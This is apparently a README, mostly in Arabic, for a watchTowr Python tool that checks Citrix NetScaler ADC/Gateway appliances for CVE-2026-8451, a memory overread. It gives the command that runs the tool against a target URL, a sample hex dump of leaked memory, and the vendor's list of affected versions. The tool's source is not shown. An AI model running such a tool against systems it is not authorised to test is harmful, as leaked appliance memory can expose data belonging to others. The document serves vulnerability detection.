
أداة استغلال بلغة Python للثغرة CVE-2026-8451 في Citrix Netscaler التي تسمح بقراءة زائدة للذاكرة. تُنشئ أدلة كشف عن طريق تسريب الذاكرة من أجهزة ADC/Gateway المستهدفة للتحقق من التعرض.
أداة توليد مؤشرات الكشف عن قراءة الذاكرة الزائدة في Citrix Netscaler!
ستقبل هذه الأداة جهاز Netscaler مستهدف، وستحاول تسريب الذاكرة عبر CVE-2026-8451.
كل ما تحتاجه هو النظام المستهدف. قم بتضمين البروتوكول، مثال https://192.168.80.125.
فيما يلي مثال على تسريب بعض الذاكرة:
$ python3 watchTowr-vs-Netscaler-CVE-2026-8451.py https://192.168.80.125
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Netscaler-CVE-2026-8451.py
(*) CVE-2026-8451 Citrix Netscaler memory overread Detection Artifact Generator
- Aliz (@alizTheHax0r) of watchTowr (@watchTowrcyber)
Leaked bytes:
00000000 f0 0d 90 74 3d ef be ad de 41 41 41 41 41 41 41 |...t=....AAAAAAA|
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
...
وفقًا لإرشادات البائع:
The following supported versions of NetScaler ADC and NetScaler Gateway are affected by the vulnerabilities:
NetScaler ADC and NetScaler Gateway 14.1 BEFORE 14.1-72.61
NetScaler ADC and NetScaler Gateway 13.1 BEFORE 13.1-63.18
NetScaler ADC FIPS BEFORE 14.1-72.61 FIPS
NetScaler ADC FIPS and NDcPP BEFORE 13.1-37.272
لأحدث الأبحاث الأمنية، تابع فريق مختبرات watchTowr